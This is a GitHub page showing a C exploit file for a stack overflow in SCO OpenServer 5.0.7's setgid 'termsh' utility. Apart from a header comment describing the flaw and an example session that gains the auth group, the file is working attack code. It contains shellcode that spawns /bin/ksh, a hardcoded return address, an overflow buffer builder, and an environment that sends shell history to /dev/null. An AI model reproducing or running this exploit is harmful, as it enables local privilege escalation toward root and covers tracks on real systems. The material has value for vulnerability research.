forked from hackerhouse-opensource/exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
prdelka-vs-SCO-termshx.c
executable file
·58 lines (55 loc) · 1.91 KB
/
prdelka-vs-SCO-termshx.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
/* SCO Openserver 5.0.7 termsh exploit
* ===================================
* 'termsh' is a program to view or modify an existing terminal entry on
* SCO Openserver. A stack based overflow exists in the handling of command
* line arguements, namely the [-o oadir] arguement. It is installed setgid
* auth in a default SCO Openserver 5.0.7 install. An attacker may use this
* flaw to gain write access to /etc/passwd or /etc/shadow allowing for
* local root compromise.
*
* Example use.
* $ id
* uid=200(user) gid=50(group) groups=50(group)
* $ uname -a
* SCO_SV scosysv 3.2 5.0.7 i386
* $ gcc prdelka-vs-SCO-termshx.c -o prdelka-vs-SCO-termshx
* $ ./prdelka-vs-SCO-termshx /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh
* [ SCO Openserver 5.0.7 termsh local privilege escalation exploit
* $ id
* uid=200(user) gid=50(group) egid=21(auth) groups=50(group)
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x68\xff\xf8\xff\x3c\x6a\x65\x89"
"\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
"\x50\x68""/ksh""\x68""/bin""\x89"
"\xe3\x50\x50\x53\xb0\x3b\xff\xd6";
int main(int argc,char* argv[])
{
char* buffer;
char* arg = "-o";
char *env[] = {"HISTORY=/dev/null",NULL};
long eip,ptr;
int i;
printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
if(argc < 2)
{
printf("[ Error : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0);
}
eip = 0xa2080853;
buffer = malloc(7449 + strlen(shellcode));
memset(buffer,'\x00',7449 + strlen(shellcode));
ptr = (long)buffer + strlen(shellcode);
strncpy(buffer,shellcode,strlen(shellcode));
for(i = 1;i <= 1862;i++)
{
memcpy((char*)ptr,(char*)&eip,4);
ptr = ptr + 4;
}
execle(argv[1],argv[1],arg,buffer,NULL,env);
exit(0);
}